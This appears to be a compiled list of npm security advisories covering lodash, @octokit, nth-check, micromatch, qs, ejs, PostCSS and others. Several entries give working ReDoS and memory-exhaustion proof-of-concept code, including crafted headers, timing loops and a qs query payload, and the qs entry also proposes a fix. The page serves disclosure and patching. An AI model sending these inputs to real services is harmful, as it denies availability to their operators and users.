All the vulnerabilities related to the version 2.17.8 of the package
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
The regular expression /<([^>]+)>; rel="deprecation"/ used to match the link header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious link header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.
The vulnerability resides in the regular expression /<([^>]+)>; rel="deprecation"/, which is used to match the link header in HTTP responses. This regular expression captures content between angle brackets (<>) followed by ; rel="deprecation". However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.
An attacker can exploit this vulnerability by sending a specially crafted link header designed to trigger excessive backtracking. For example, the following headers:
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
The crafted link header consists of 100,000 consecutive < characters followed by a closing >. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.
The issue is present in the following code:
const matches = responseHeaders.link && responseHeaders.link.match(/<([^>]+)>; rel="deprecation"/);
In this scenario, the link header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.
import { request } from "@octokit/request";
const originalFetch = globalThis.fetch;
globalThis.fetch = async (url, options) => {
const response = await originalFetch(url, options);
const fakeHeaders = new Headers(response.headers);
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
return new Response(response.body, {
status: response.status,
statusText: response.statusText,
headers: fakeHeaders
});
};
request("GET /repos/octocat/hello-world")
.then(response => {
// console.log("[+] Response received:", response);
})
.catch(error => {
// console.error("[-] Error:", error);
});
// globalThis.fetch = originalFetch;
This is a Denial of Service (DoS) vulnerability caused by a ReDoS (Regular Expression Denial of Service) flaw. The vulnerability allows an attacker to craft a malicious link header that exploits the inefficient backtracking behavior of the regular expression used in the code.
The primary impact is the potential for server resource exhaustion, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.
The vulnerability impacts any system that uses this specific regular expression to process link headers in HTTP responses. This can include:
link header, making it a low-barrier attack that could be exploited by anyone.@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
The issue occurs at line 52 of iterator.ts in the @octokit/request-error repository.
The vulnerability is caused by the use of an inefficient regular expression in the handling of the authorization header within the request processing logic:
authorization: options.request.headers.authorization.replace(
/ .*$/,
" [REDACTED]"
)
The regular expression / .*$/ matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an authorization header containing a long sequence of spaces followed by a newline and "@", such as:
headers: {
authorization: "" + " ".repeat(100000) + "\n@",
}
Due to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-service condition, impacting availability.
import { RequestError } from "@octokit/request-error";
const error = new RequestError("Oops", 500, {
request: {
method: "POST",
url: "https://api.github.com/foo",
body: {
bar: "baz",
},
headers: {
authorization: ""+" ".repeat(100000)+"\n@",
},
},
response: {
status: 500,
url: "https://api.github.com/foo",
headers: {
"x-github-request-id": "1:2:3:4",
},
data: {
foo: "bar",
},
},
});
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to an inefficient regular expression (/ .*$/) used to sanitize the authorization header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial-of-service (DoS).
authorization headers are at risk, especially those processing a large volume of authentication requests.Regular Expression Denial of Service in debug
Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter.
As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.
This was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.
Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Command injection in gitlog
The gitlog function in src/index.ts in gitlog before 4.0.4 has a command injection vulnerability.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
ejs lacks certain pollution protection
The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.
ejs template injection vulnerability
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = utils.combine([], leaf); // No arrayLimit check
}
Working code (lib/parse.js:175):
else if (index <= options.arrayLimit) { // Limit checked here
obj = [];
obj[index] = leaf;
}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
Test 1 - Basic bypass:
npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length); // Output: 6 (should be max 5)
Test 2 - DoS demonstration:
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)a[]=value (not indexed a[0]=value)Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)qs.parse(query, { arrayLimit: 100 })Real-world impact:
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf); // No arrayLimit check
}
Fixed code:
if (root === '[]' && options.parseArrays) {
// Use currentArrayLength already calculated at line 147-151
if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
}
// If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
if (currentArrayLength >= options.arrayLimit) {
obj = options.plainObjects ? { __proto__: null } : {};
obj[currentArrayLength] = leaf;
} else {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf);
}
}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).